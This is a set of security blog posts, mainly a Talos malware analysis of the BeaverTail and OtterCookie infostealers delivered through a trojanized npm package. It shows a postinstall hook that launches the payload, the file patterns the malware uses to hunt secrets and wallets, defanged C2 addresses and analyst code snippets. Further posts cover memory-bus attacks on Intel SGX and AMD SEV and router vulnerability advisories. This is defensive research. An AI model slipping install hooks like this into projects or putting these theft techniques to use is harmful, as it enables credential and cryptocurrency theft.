BeaverTail and OtterCookie evolve with a new Javascript module

  • Cisco Talos has uncovered a new attack linked to Famous Chollima, a threat group aligned with North Korea (DPRK). This group is known for impersonating hiring organizations to target job seekers, tricking them into installing information-stealing malware to obtain cryptocurrency and user credentials. 
  • In this incident, although the organization was not directly targeted, one of its systems was compromised, likely because a user was deceived by a fake job offer and installed a trojanized Node.js application called “Chessfi.”
  • The malicious software was distributed via a Node.js package named “node-nvm-ssh” on the official NPM repository.
  • Famous Chollima often uses two malicious tools, BeaverTail and OtterCookie, which started as separate but complementary programs. Recent campaigns have seen their functions merging, and Talos has identified a new module for keylogging and taking screenshots. 
  • While searching for related threats, Talos also found a malicious VS Code extension containing BeaverTail and OtterCookie code. Although attribution to Famous Chollima is not certain, this suggests the group may be testing new methods for delivering their malware. 

Introduction 


In a previous Cisco Talos blog post, we described one side of the Contagious Interview (Deceptive Development) campaigns, where the threat actor utilized fake employment websites, ClickFix social engineering techniques and payload variants of credential and cryptocurrency remote access trojans (RATs) known as GolangGhost and PylangGhost. 

 Talos is actively monitoring other clusters of these campaigns, which are attributed to the threat actor group Famous Chollima, a subgroup of Lazarus, and aligned with the economic interests of DPRK. This post discusses some of the tactics, techniques and procedures (TTPs) and changes in tooling developed over time by another large cluster of Contagious Interview activities. These campaigns center around tools known as BeaverTail and OtterCookie.  

 Famous Chollima frequently uses BeaverTail and OtterCookie, with many individual sub-clusters of activities installing InvisibleFerret, a Python based modular payload. Although BeaverTail and OtterCookie originated as separate-but-complementary entities, their functionality in some recent campaigns started to merge, along with the inclusion of new functional OtterCookie modules. 

Talos detected a Famous Chollima campaign in an organization headquartered in Sri Lanka. The organization was not deliberately targeted by the attackers, but one of the systems on its network was infected. It is likely that a user fell for a fake job offer instructing them to install a trojanized Node.js application called Chessfi as part of a fake job interview process. 

Once Talos conducted the initial analysis, we realized that the tools used in the attack had characteristics of both BeaverTail and OtterCookie, blurring the distinction between the two. The code also contained some additional functionality we had not previously encountered. 

BeaverTail and OtterCookie combine 

This blog focuses on OtterCookie modules and will not provide a deep dive into well-known BeaverTail and OtterCookie functionality. While some of these modules are already known, at least one was not previously documented. The examples we show are already deobfuscated, and with the help of an LLM, the function and variable names have been replaced with names that correspond to their actual functionality. 

Keylogging and screenshotting module 

Talos encountered a keylogging and screenshotting module in this campaign that has not been previously documented. We were able to find earlier OtterCookie samples containing the module that were uploaded to VirusTotal in April 2025.  

The keylogging module uses the packages “node-global-key-listener” for keylogging, “screenshot-desktop” for taking desktop screenshots and “sharp” for converting the captured screenshots into web-friendly image formats. 

The module configures the packages to listen for keystrokes and periodically takes screenshots of the current desktop session, uploading both to the OtterCookie command and control (C2) server. 

Figure 1. The keylogger listens for keyboard and mouse key presses and saves them to a file. 

The keystrokes are saved in the user’s temporary sub-folder windows-cache with the file name “1.tmp” and screenshots are saved in the same sub-folder with the file name “2.jpeg”. While the keylogger runs in a loop and flushes the buffer every second, a screenshot is taken every four seconds.  

Talos also discovered one instance of the module where clipboard monitoring was included in the module code, extending its functionality to stealing clipboard content. 

The keylogging data and the captured screenshots are uploaded to the OtterCookie C2 server on TCP port 1478, using the URL “hxxp[://]172[.]86[.]88[.]188:1478/upload”. 

Figure 2. Keystrokes saved as “1.tmp” and screenshots as “2.jpeg”, then uploaded to C2 server. 
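
For defenders, these artifact names offer a simple hunting opportunity. The following is a minimal, defensive sketch in Node.js that checks for the reported file names in a “windows-cache” sub-folder of the user’s temporary directory; the exact parent directory is an assumption based on the description above, so adjust the paths to your environment.

```javascript
// Defensive hunting sketch: look for the artifact files reported above
// ("1.tmp" keystroke log, "2.jpeg" screenshot) in a "windows-cache"
// sub-folder of the user's temporary directory. The parent directory
// is an assumption based on the behavior described in this post.
const fs = require("fs");
const os = require("os");
const path = require("path");

const suspectDir = path.join(os.tmpdir(), "windows-cache");

for (const name of ["1.tmp", "2.jpeg"]) {
  const candidate = path.join(suspectDir, name);
  if (fs.existsSync(candidate)) {
    const { size, mtime } = fs.statSync(candidate);
    console.log(`Possible OtterCookie artifact: ${candidate} (${size} bytes, modified ${mtime.toISOString()})`);
  }
}
```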

OtterCookie VS Code extension 

During the search for similar samples on VirusTotal, Talos discovered a recently uploaded VS Code extension, which may attempt to run OtterCookie if installed in the victim’s editor environment. The extension is a fake employment onboarding helper, supposedly allowing the user to track and manage candidate tests. 

While Talos cannot attribute this VS Code extension to Famous Chollima with high confidence, this may indicate that the threat actor is experimenting with different delivery vectors. The extension could also be a result of experimentation from another actor, possibly even a researcher, who is not associated with Famous Chollima, as this stands out from their usual TTPs. 

Figure 3. VS Code extension configuration pretends to be Mercer Onboarding Helper but contains OtterCookie code. 

Other OtterCookie modules 

The OtterCookie section of the code starts with the definition of a JSON object that contains configuration values such as a unique campaign ID and the C2 server IP address. The OtterCookie portion of the code constructs additional modules from strings, which are executed as child processes. In the attack we analyzed, we observed three modules, but we also found one additional module while hunting for similar samples in our repositories and on VirusTotal.  

Remote shell module 

The first module is fundamental for OtterCookie and begins with the detection of the infected system platform and a virtual machine check, followed by reporting the collected user and host information to the OtterCookie C2 server. 

Figure 4. The main OtterCookie module starts with system checks, including a virtual machine check. 

Once the system information is submitted, the module installs the “socket.io-client” package, which is used to connect to a specific port on the OtterCookie C2 server, wait for commands and execute them in a loop. socket.io-client first uses HTTP and then switches to the WebSocket protocol to communicate with the server, which we observed listening on TCP port 1418.  

Figure 5. socket.io-client package used for communication with C2 server. 
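
The HTTP-then-WebSocket behavior is standard socket.io-client transport negotiation rather than anything unique to the malware. The benign sketch below, pointed at a loopback placeholder address instead of a real C2, shows how a client starts over HTTP long-polling and reports when it upgrades to WebSocket; the port mirrors the one observed, but the address and the event handling are illustrative only.

```javascript
// Benign illustration of socket.io-client's transport negotiation:
// the connection starts over HTTP long-polling and upgrades to WebSocket.
// The loopback address below is a placeholder for a local test server.
const { io } = require("socket.io-client");

const socket = io("http://127.0.0.1:1418", {
  transports: ["polling", "websocket"], // default order: polling first, then upgrade
});

socket.on("connect", () => {
  console.log("connected via", socket.io.engine.transport.name); // "polling"
  socket.io.engine.on("upgrade", (transport) => {
    console.log("upgraded to", transport.name); // "websocket"
  });
});
```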

Finally, depending on the operating system, this module periodically checks the clipboard content using the commands “pbpaste” on macOS or “powershell Get-Clipboard” on Windows. It sends the clipboard content to the C2 server URL specifically used for logging OtterCookie activities at “hxxp[://]172[.]86[.]88[.]188/api/service/makelog”. 

File uploading module 

This module enumerates all drives and traverses the file system in order to find files to be uploaded to the OtterCookie C2 IP address at a specific port and URL (in this case, “hxxp[://]172[.]86[.]88[.]188:1476/upload”).  

This module contains a list of folder and file names to be excluded from the search, and another list with target file name extensions and file name search patterns to select files to be uploaded.  

Figure 6. The list of excluded folders and patterns for files uploaded to C2. 

The “interesting” file list contains the following search patterns: 
 
“*.env*”, “*metamask*”, “*phantom*”, “*bitcoin*”, “*btc*”, “*Trust*”, “*phrase*”, “*secret*”, “*phase*”, “*credential”, “*profile*”, “*account*”, “*mnemonic*”, “*seed*”, “*recovery*”, “*backup*”, “*address*”, “*keypair*”, “*wallet*”, “*my*”, “*screenshot*”, “*.doc”, “*.docx”, “*.pdf”, “*.md”, “*.rtf”, “*.odt”, “*.xls”, “*.xlsx”, “*.txt”, “*.ini”, “*.secret”, “*.json”, “*.ts”, “*.js”, “*.csv” 

Cryptocurrency extensions stealer module 

While not present in the campaign Talos analyzed, this module was found while looking for similar files on VirusTotal. In addition to the cryptocurrency browser extensions targeted by the BeaverTail code, this OtterCookie module targets extensions from a list that partially overlaps with the list of cryptocurrency wallet extensions in the BeaverTail part of the payload. 

Table 1. Cryptocurrency modules targeted by OtterCookie. 

The cryptocurrency module targets the Google Chrome and Brave browsers. If any extensions are found in any of the browser profiles, the extension files as well as the saved Login and Web data are uploaded to a C2 server URL. In the sample Talos discovered, the upload C2 URL was “hxxp[://]138[.]201[.]50[.]5:5961/upload”. 

OtterCookie evolution 

OtterCookie malware samples were first observed by NTT Security Holdings around November 2024, leading to a blog article published in December 2024. However, it is believed that the malware has been in use since approximately September 2024. The name OtterCookie seems to come from the early samples that used the content of HTTP response cookies to transfer the malicious code executed by the response handler. This remote code-loading mechanism evolved over time to include additional functionality.  

However, in April 2025, Talos started seeing additional modules included within the OtterCookie code, with the C2 server used mostly for downloading a simple OtterCookie configuration and uploading stolen data. 

Figure 7. OtterCookie modules evolution timeline.

OtterCookie evolved from its initial basic data-gathering capabilities to a more modular design for data theft and remote command execution. The modules are stored within OtterCookie strings and executed on the fly. 

The earliest versions, corresponding to what NTT researchers refer to as v1, contain code for remote command execution (RCE) and use a socket.IO package to communicate with a C2 server. Over time, OtterCookie modules evolved by adding code to steal and upload files, with the end goal of stealing cryptocurrency wallets from a list of hardcoded browser extensions and saved browser credentials. Targeted browsers include Brave, Google Chrome, Opera and Mozilla Firefox. 

The next iteration, referred to as v2, included clipboard-stealing code that uses the Clipboardy package to send clipboard contents to the remote server. This version also handles the loading of Javascript code from the server slightly differently. Instead of the client evaluating the returned header cookie as in v1, the server generates an error which gets handled by the error handler on the client side. The error handler simply passes the error response data to the eval function, where it gets executed. The loader code is small and easy to miss, and along with the risk of false positive detections, this may be why detection of the OtterCookie loaders on VirusTotal is not very successful. 

Figure 8. C2 server generates an error but the code is still executed by OtterCookie. 
Figure 9. OtterCookie loader error handler evaluates the response data. 

The v3 variant, observed in February 2025, includes a function to send specific files (documents, image files and cryptocurrency-related files) to the C2 server. OtterCookie v4, observed since April 2025, includes virtual environment detection code to help attackers distinguish logs from sandbox environments from those of actual infections, indicating a focus on evading analysis. The code also contains some anti-debugging and anti-logging functionality.  

The v4 variant improves on the previous version’s code and updates the clipboard content-stealing method. It no longer uses the Clipboardy library and instead uses standard macOS or Windows commands for retrieving clipboard content. 

It is important to note that, over time, the difference between BeaverTail and OtterCookie became blurred, and in some attacks their code was merged into a single tool.  

OtterCookie v5 

The campaign Talos observed in August 2025 uses the most recent version of OtterCookie, which we call v5, demonstrated by the addition of a keylogging module. The keylogging module contains code to capture screenshots, which are uploaded to the C2 server together with keyboard keystrokes. 

Figure 10. Node-nvm-ssh infection path. 

The initial infection vector was a modified Chessfi application hosted on Bitbucket. Chessfi is a web3-based multiplayer chess platform where players can challenge each other and bet cryptocurrency on the outcome of their matches. The choice of a cryptocurrency-related application to lure victims is consistent with previous reporting on Famous Chollima targeting.  

The first sign of the attack was the user installing the source code of the application. Based on the project folder name, we assess with moderate confidence that the victim was approached by the threat actor through the freelance marketplace site Fiverr, which is consistent with previous reporting. While hunting for similar samples, we also discovered code repositories that were delivered to victims as attachments in Discord conversations.   

The infection process started with the victim running Git to clone the repository: 

Figure 11. The initial infection vector. 

The Development section of the application’s readme document gives instructions to developers on how to install and run the project. After cloning the repository, users are instructed to run npm install to install dependencies, which, in this campaign, also included a malicious npm package named “node-nvm-ssh”. 

Figure 12. Modified application installation steps. 

During the installation of dependencies, the malicious package is downloaded from the repository and installed. The npm installer parses the package.json file of the malicious package and finds instructions to run commands after the installation. This is done by parsing the “postinstall” value of the JSON object named “scripts”. At first glance, it seems like the postinstall scripts are there to run tests, transpile TypeScript files to Javascript and possibly run other test scripts. 

Figure 13. Malicious package.json file contains the instruction that will cause the malicious code to run. 

However, the package.json installation instruction “npm run skip” causes npm to call the command “node test/fixtures/eval” specified in the value of “skip”. Because no file name is specified, the default Node.js loading conventions try a number of file names, one of them being index.js. 
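
To make the chain concrete, below is a minimal, hypothetical reconstruction of how such a package.json could wire a postinstall hook to the “skip” script. The script names mirror those reported above; the rest of the file is illustrative and does not reproduce the real package.

```json
{
  "name": "node-nvm-ssh",
  "scripts": {
    "postinstall": "npm run skip",
    "skip": "node test/fixtures/eval"
  }
}
```

When npm finishes installing the package, it runs the postinstall hook automatically, which is what kicks off the chain described here.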

The file test/fixtures/eval/index.js contains code to spawn a child process using the file “test/fixtures/eval/node_modules/file15.js”. 

Figure 14. index.js spawning a child process to execute file15.js. 

Eventually, file15.js loads the file test.list, which is the final payload. This somewhat convoluted path to the payload makes it quite difficult for an unsuspecting software engineer to discover that installing the Chessfi application will eventually lead to the execution of malicious code.   

Figure 15. file15.js reads and calls eval on the content of the file test.list.

With test.list, we have finally reached the last piece of the puzzle of how the malicious code is run. The test.list file is over 100 KB long and obfuscated using Obfuscator.io. Thankfully, the obfuscation in this case is not configured to make analysis very difficult, and with the help of a deobfuscator and an LLM, Talos was able to deobfuscate most of its functionality, revealing a combination of BeaverTail and OtterCookie. 

Standard BeaverTail functionality 

There seem to be two distinguishable parts in the code. The first is associated with BeaverTail, including enumeration of various browser profiles and extensions as well as the download of a Python distribution and Python client payload from the C2 server “23.227.202[.]244” using the common BeaverTail/InvisibleFerret TCP port 1224. The second part of the code is associated with OtterCookie. 

The BeaverTail portion starts with a function that disables console logging, then loads the required modules and calls functions to steal data from a list of browser extensions, cryptocurrency wallets and browser credential storage.   

Table 2. Targeted BeaverTail cryptocurrency browser extensions.

BeaverTail evolution 

BeaverTail has been observed since at least May 2023, and it originally was a relatively small downloader component designed to be included with Node.js-based Javascript applications. BeaverTail was also used in supply chain attacks affecting packages in the NPM package repository, which has been extensively covered in previous research and is outside the scope of this post. 

From the beginning, BeaverTail supported Windows, Linux and macOS, taking advantage of the fact that Node.js applications can be run on different operating system platforms.  

Figure 16. Early BeaverTail OS platform check. 

The other major functionalities within BeaverTail are the download of InvisibleFerret Python stealer payload modules and the installation of a remote access module, typically an AnyDesk client, which allows the attacker to take control of the infected machine remotely. Information stealing and remote access have remained recurring BeaverTail operational techniques over time. 

Soon after the initial samples were discovered in June 2023, BeaverTail started to use simple base64 encoding of strings and renaming of variables to make detection and analysis more difficult. This also included a scheme that encodes the C2 URL as a shuffled string whose slices are base64 decoded individually and then concatenated in the correct order to generate the final URL.  

Figure 17. C2 URL encoding scheme used from early BeaverTail variants until the present. 
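
The general idea can be illustrated with a short, hypothetical reconstruction: the URL is stored as out-of-order base64 slices and reassembled at runtime by decoding each slice and concatenating the pieces in a hardcoded order. The slice boundaries, the index order and the loopback placeholder URL below are invented for the example; real samples encode their own C2 addresses and differ in the details.

```javascript
// Hypothetical illustration of the encoding scheme described above.
// The slices are stored shuffled; a hardcoded index order restores the URL.
const slices = ["Ny4wLjAu", "aHR0cDovLzEy", "MToxMjI0"]; // stored out of order
const order = [1, 0, 2];                                 // reassembly order

const url = order
  .map((i) => Buffer.from(slices[i], "base64").toString("utf8"))
  .join("");

console.log(url); // http://127.0.0.1:1224 (loopback placeholder, not a real C2)
```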

Although BeaverTail is typically written in Javascript, Talos has also discovered several C2 server IP addresses from Javascript samples that were shared with compiled C++ binary variants created with the help of the Qt framework. 

Figure 18. Qt-based BeaverTail setting QThread parameters. 

From its early beginnings in mid-2023 to the last quarter of 2024, BeaverTail C2 URL patterns stabilized around the most commonly used TCP ports 1224 and 1244, rather than port 3306 used by early variants. It seems that the threat actors quickly realized that most Windows installations do not come with a preinstalled Python interpreter, unlike Linux distributions and macOS. To tackle this issue, they included code which installs a Python distribution, typically from the “/pdown” URL path, required to run the Python InvisibleFerret modules. This TTP remains in use today. 

In terms of detection evasion, Famous Chollima uses several methods to obfuscate code, most frequently utilizing different configurations of the free Javascript tool Obfuscator.io, which makes analysis, and especially detection, of the malicious code more challenging.  

In addition to obfuscating the Javascript code, they also regularly use various modes of XOR-based obfuscation for downloaded modules. XOR-ed Python InvisibleFerret modules start with a unique user-based string assignment, followed by a reversed base64-encoded string that contains the final Python module’s code, which may itself be XOR-ed for obfuscation. 

Figure 19. A typical InvisibleFerret self-decoding Python module. 
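
For analysts, unwrapping such a module is straightforward once the layout is known. The helper below is a minimal sketch, assuming a reversed base64 layer followed by an optional repeating XOR key as described above; the key length and exact layering vary between samples.

```javascript
// Analyst helper sketch: reverse the string, base64-decode it, then apply an
// optional repeating XOR key. The layering and key handling are assumptions
// based on the description above and vary between real samples.
function unwrapModule(reversedB64, xorKey = null /* Buffer or null */) {
  const decoded = Buffer.from([...reversedB64].reverse().join(""), "base64");
  if (!xorKey) return decoded.toString("utf8");
  const out = Buffer.alloc(decoded.length);
  for (let i = 0; i < decoded.length; i++) {
    out[i] = decoded[i] ^ xorKey[i % xorKey.length];
  }
  return out.toString("utf8");
}

// Round-trip test with a harmless string:
const wrapped = [...Buffer.from("print('hello')").toString("base64")].reverse().join("");
console.log(unwrapModule(wrapped)); // print('hello')
```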

Thankfully, by using a combination of a deobfuscating tool and an LLM to rename variables and base64-decode encoded strings, it is possible to analyze new samples with relative ease. However, the operational tempo of groups attributed to Famous Chollima is high, and the detection of completely new samples and code on VirusTotal remains unreliable, allowing threat actors enough time to successfully attack some victims. 

BeaverTail, OtterCookie and InvisibleFerret functional overlaps

All additional modules present in the OtterCookie code correspond well to the functionality that is traditionally associated with InvisibleFerret and its Python-based modules, as well as some parts of the BeaverTail code. This move of functionality to Javascript may allow the threat actors to remove their reliance on Python code, eliminating the requirement to install full Python distributions on Windows. 

Table 3. Functional similarities between Famous Chollima tools. 

Coverage   

Ways our customers can detect and block this threat are listed below.    


Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.   

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.   

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.   

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.   

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.   

Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles. Secure Access provides seamless, transparent and secure access to the internet, cloud services or private applications no matter where your users work. Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access.   

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.    

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.    

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.   

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.    

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.  

Snort2 rules are available for this threat: 65336 

The following Snort3 rules are also available to detect the threat: 301315, 65336 

ClamAV detections are also available for this threat: Js.Infostealer.Ottercookie-10057842-0, Js.Malware.Ottercookie-10057860-0   

IOCs

IOCs for this research can also be found at our GitHub repository here.

Early OtterCookie 

f08e3ee84714cc5faefb7ac300485c879356922003d667587c58d594d875294e 

BeaverTail evolution: 

72ebfe69c69d2dd173bb92013ab44d895a3367f91f09e3f8d18acab44e37b26d 

caad2f3d85e467629aa535e0081865d329c4cd7e6ff20a000ea07e62bf2e4394 

8efa928aa896a5bb3715b8b0ed20881029b0a165a296334f6533fa9169b4463b 

 

Malicious npm package Aug 2025

83c145aedfdf61feb02292a6eb5091ea78d8d0ffaebf41585c614723f36641d8 – test.list 

 

Similar to our campaign 

77aec48003beeceb88e70bed138f535e1536f4bbbdff580528068ad6d184f379 

0904eff1edeff4b6eb27f03e0ccc759d6aa8d4e1317a1e6f6586cdb84db4a731 

d27c9f75c3f1665ee19642381a4dd6f2e4038540442cf50948b43f418730fd0a 

51ddd8f6ff30d76de45e06902c45c55163ddbec7d114ad89b21811ffedb71974 

d89c45d65a825971d250d12bc7a449321e1977f194e52e4ca541e8a908712e47 

6a9b4e8537bb97e337627b4dd1390bdb03dc66646704bd4b68739d499bd53063 

a6914ded72bdd21e2f76acde46bf92b385f9ec6f7e6b7fdb873f21438dfbff1d 

 

VSCode Extension

9e65de386b40f185bf7c1d9b1380395e5ff606c2f8373c63204a52f8ddc01982 

dff2a0fb344a0ad4b2c129712b2273fda46b5ea75713d23d65d5b03d0057f6dd – raw.js 

 

C2 URLs
hxxp[://]23[.]227[.]202[.]244:1224/uploads 

hxxp[://]23[.]227[.]202[.]244:1224/pdown 

hxxp[://]23[.]227[.]202[.]244:1224/client/14/144 

hxxp[://]23[.]227[.]202[.]244:1224/payload/14/144 

hxxp[://]23[.]227[.]202[.]244:1224/brow/14/144 

hxxp[://]23[.]227[.]202[.]244:1224/keys  

hxxp[://]172[.]86[.]88[.]188:1418/socket[.]io/ 

hxxp[://]172[.]86[.]88[.]188:1476/upload 

hxxp[://]172[.]86[.]88[.]188/api/service/makelog 

hxxp[://]172[.]86[.]88[.]188/api/service/process/c841b6c4ac4d2e83f16cf7a8bfbec3d7 

hxxp[://]138[.]201[.]50[.]5:5961/upload 

hxxp[://]135[.]181[.]123[.]177/api/service/makelog 

hxxp[://]144[.]172[.]96[.]35/api/service/makelog 

hxxp[://]144[.]172[.]112[.]50/api/service/makelog 

hxxp[://]172[.]86[.]73[.]46 

hxxp[://]135[.]181[.]123[.]177 

hxxp[://]172[.]86[.]113[.]12

Download URLs 

hxxps[://]www[.]npmjs[.]com/package/node-nvm-ssh 

hxxps[://]bitbucket[.]org/dev-chess/chess-frontend[.]git 

Cisco Talos Blog – ​Read More

WireTap and Battering RAM: attacks on TEEs | Kaspersky official blog

Modern server processors feature a trusted execution environment (TEE) for handling especially sensitive information. There are many TEE implementations, but two are most relevant to this discussion: Intel Software Guard eXtensions (SGX), and AMD Secure Encrypted Virtualization (SEV). Almost simultaneously, two separate teams of researchers — one in the U.S. and one in Europe — independently discovered very similar (though distinct) methods for exploiting these two implementations. Their goal was to gain access to encrypted data held in random access memory. The scientific papers detailing these results were published just days apart:

  • WireTap: Breaking Server SGX via DRAM Bus Interposition is the effort of U.S. researchers, which details a successful hack of the Intel Software Guard eXtensions (SGX) system. They achieved this by intercepting the data exchange between the processor and the DDR4 RAM module.
  • In Battering RAM, scientists from both Belgium and the UK also successfully compromise Intel SGX, as well as AMD’s comparable security system, SEV-SNP, by manipulating the data-transfer process between the processor and the DDR4 RAM module.

Hacking a TEE

Both the technologies mentioned — Intel SGX and AMD SEV — are designed to protect data even if the system processing it is completely compromised. Therefore, the researchers began with the premise that the attacker would have complete freedom of action: full access to both the server’s software and hardware, and the confidential data they seek residing, for instance, on a virtual machine running on that server.

In that scenario, certain limitations of both Intel SGX and AMD SEV become critical. One example is the use of deterministic encryption: an algorithm where a specific sequence of input data always produces the exact same sequence of encrypted output data. Since the attacker has full access to the software, they can input arbitrary data into the TEE. If the attacker also had access to the resulting encrypted information, comparing these two data sets would allow them to calculate the private key used. This, in turn, would enable them to decrypt other data encrypted by the same mechanism.
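
As a toy illustration of why determinism matters, the snippet below uses AES in ECB mode, a classic deterministic construction, to show that identical plaintext blocks always produce identical ciphertext blocks. This is not the actual SGX or SEV memory-encryption algorithm; it only demonstrates the property that makes known-plaintext comparisons useful to an attacker.

```javascript
// Toy demonstration of deterministic encryption: with AES-ECB, the same
// plaintext block under the same key always yields the same ciphertext block.
// Illustration only, not the memory-encryption scheme used by SGX/SEV.
const crypto = require("crypto");

const key = crypto.randomBytes(16);

function encryptEcb(buf) {
  const cipher = crypto.createCipheriv("aes-128-ecb", key, null);
  cipher.setAutoPadding(false); // inputs below are block-aligned (16-byte multiples)
  return Buffer.concat([cipher.update(buf), cipher.final()]);
}

const block = Buffer.alloc(16, "A");                      // one 16-byte block of 'A'
const twice = encryptEcb(Buffer.concat([block, block]));  // the same block twice

console.log(encryptEcb(block).equals(encryptEcb(block))); // true: deterministic
console.log(twice.subarray(0, 16).equals(twice.subarray(16))); // true: repeated input leaks structure
```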

The challenge, however, is how to read the encrypted data. It resides in RAM, and only the processor has direct access to it. The theoretical malware only sees the original information before it gets encrypted in memory. This is the main challenge, which the researchers approached in different ways. One straightforward, head-on solution is hardware-level interception of the data being transmitted from the processor to the RAM module.

How does this work? The memory module is removed and then reinserted using an interposer, which is also connected to a specialized device: a logic analyzer. The logic analyzer intercepts the data streams traveling across all the data and address lines to the memory module. This is quite complex. A server typically has many memory modules, so the attacker must find a way to force the processor to write the target information specifically to the desired range. Next, the raw data captured by the logic analyzer must be reconstructed and analyzed.

But the problems don’t end there. Modern memory modules exchange data with the processor at tremendous speeds, performing billions of operations per second. Intercepting such a high-speed data flow requires high-end equipment. The hardware that was used to prove the feasibility of this type of attack in 2021 cost hundreds of thousands of dollars.

The features of WireTap

The U.S. researchers behind WireTap managed to slash the cost of their hack to just under a thousand dollars. Their setup for intercepting data from the DDR4 memory module looked like this:


Test system for intercepting the data exchange between the processor and the memory module.

They spent half of the budget on an ancient, quarter-century-old logic analyzer, which they acquired through an online auction. The remainder covered the necessary connectors, and the interposer (the adapter into which the target memory module was inserted) was custom-soldered by the authors themselves. An obsolete setup like this could not possibly capture the data stream at its normal speed. However, the researchers made a key discovery: they could slow down the memory module’s operation. Instead of the standard DDR4 effective speeds of 1600–3200 megahertz, they managed to throttle the speed down to 1333 megahertz.

From there, the steps are… well, not really simple, but clear:

  1. Ensure that the data from the target process was written to the hacked memory module and then intercept it, still encrypted at this stage.
  2. Input a custom data set into Intel SGX for encryption.
  3. Intercept the encrypted version of the known data, compare the known plaintext with the resulting ciphertext, and compute the encryption key.
  4. Decrypt the previously captured data belonging to the target process.

In summary, the WireTap work doesn’t fundamentally change our understanding of the inherent limitations of Intel SGX. It does, however, demonstrate that the attack can be made drastically cheaper.

The features of Battering RAM

Instead of the straightforward data-interception approach, the researchers from Belgium’s KU Leuven university and their UK colleagues sought a more subtle and elegant method to access encrypted information. But before we dive into the details, let’s look at the hardware component and compare it to the American team’s work:


The memory module interposer used in Battering RAM.

In place of a tangle of wires and a bulky data analyzer, this setup features a simple board designed from scratch, into which the target memory module is inserted. The board is controlled by an inexpensive Raspberry Pi Pico microcomputer. The hardware budget is negligible: just 50 euros! Moreover, unlike the WireTap attack, Battering RAM can be conducted covertly; continuous physical access to the server isn’t needed. Once the modified memory module is installed, the required data can be stolen remotely.

What exactly does this board do? The researchers discovered that by grounding just two address lines (which dictate where information is written or read) at the right moment, they could create a data mirroring situation. This causes information to be written to memory cells that the attacker can access. The interposer board acts as a pair of simple switches controlled by the Raspberry Pi microcomputer. While manipulating contacts on live hardware typically leads to a system freeze or data corruption, the researchers achieved stable operation by disconnecting and reconnecting the address lines only at the precise moments required.

This method gave the authors the ability to select where their data was recorded. Crucially, this means they didn’t even need to compute the encryption key! They first captured the encrypted information from the target process. Next, they ran their own program within the same memory range and requested the TEE system to decrypt the previously captured information. This technique allowed them to hack not only Intel SGX but also AMD SEV. Furthermore, this control over data writing helped them circumvent AMD’s security extension called SEV-SNP. This extension, using Secure Nested Paging, was designed to protect the virtual machine from compromise by preventing data modification in memory. Circumventing SEV-SNP theoretically allows attackers not only to read encrypted data but also to inject malicious code into a compromised virtual machine.

The relevance of physical attacks on server infrastructure

It’s clear that while the practical application of such attacks is possible, they’re unlikely to be conducted in the wild. The value of the stolen data would need to be extremely high to justify hardware-level tampering. At least, this is the stance taken by both Intel and AMD regarding their security solutions: both chipmakers responded to the researchers by stating that physical attacks fall outside their security model. However, both the American and European research teams demonstrated that the cost of these attacks is not nearly as high as previously believed. This potentially expands the list of threat actors willing to utilize such complex vulnerabilities.

The proposed attacks do come with their own restrictions. As we already mentioned, the information theft was conducted on systems equipped with DDR4 standard memory modules. The newer DDR5 standard, finalized in 2020, has not yet been compromised, even for research purposes. This is due both to the revised architecture of the memory modules and their increased operating speeds. Nevertheless, it’s highly likely that researchers will eventually find vulnerabilities in DDR5 as well. And that’s a good thing: the declared security of TEE systems must be regularly subjected to independent audits. Otherwise, it could turn out at some point that a supposedly trusted protection system unexpectedly becomes completely useless.

Kaspersky official blog – ​Read More

Open PLC and Planet vulnerabilities


Cisco Talos’ Vulnerability Discovery & Research team recently disclosed one vulnerability in the OpenPLC logic controller and four vulnerabilities in the Planet WGR-500 router.  

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.     

OpenPLC denial-of-service vulnerability

Discovered by a member of Cisco Talos.   

OpenPLC is an open-source programmable logic controller intended to provide a low cost industrial solution for automation and research. 

Talos researchers found TALOS-2025-2223 (CVE-2025-53476), a denial-of-service vulnerability in the ModbusTCP server functionality of OpenPLC_v3. A specially crafted series of network connections can prevent the server from processing subsequent Modbus requests. An attacker can open a series of TCP connections to trigger this vulnerability.

Planet WGR-500 stack-based buffer overflow, OS command injection, format string vulnerabilities

Discovered by Francesco Benvenuto of Cisco Talos.   

The Planet Networking & Communication WGR-500 is an industrial router designed for Internet of Things (IoT) networks, particularly industrial networks such as transportation, government buildings, and other public areas. Talos found four vulnerabilities in the router software.

TALOS-2025-2226 (CVE-2025-54399 – CVE-2025-54402) includes multiple stack-based buffer overflow vulnerabilities in the formPingCmd functionality. A specially crafted series of HTTP requests can lead to stack-based buffer overflow.

TALOS-2025-2227 (CVE-2025-54403 – CVE-2025-54404) includes multiple OS command injection vulnerabilities in the swctrl functionality. A specially crafted network request can lead to arbitrary command execution.

TALOS-2025-2228 (CVE-2025-48826) is a format string vulnerability in the formPingCmd functionality of Planet WGR-500. A specially crafted series of HTTP requests can lead to memory corruption.

TALOS-2025-2229 (CVE-2025-54405 – CVE-2025-54406) includes multiple OS command injection vulnerabilities in the formPingCmd functionality. A specially crafted series of HTTP requests can lead to arbitrary command execution.

Cisco Talos Blog – ​Read More

5 Ways Threat Intelligence Saves Businesses Money and Resources 

Cybersecurity is not just about defense; it is about protecting profits. Organizations without modern threat intelligence (TI) face escalating breach costs, wasted resources, and operational inefficiencies that hit the bottom line.  

Here is how actionable intel can help businesses cut costs, optimize workflows, and neutralize risks before they escalate. 

Key Takeaways 

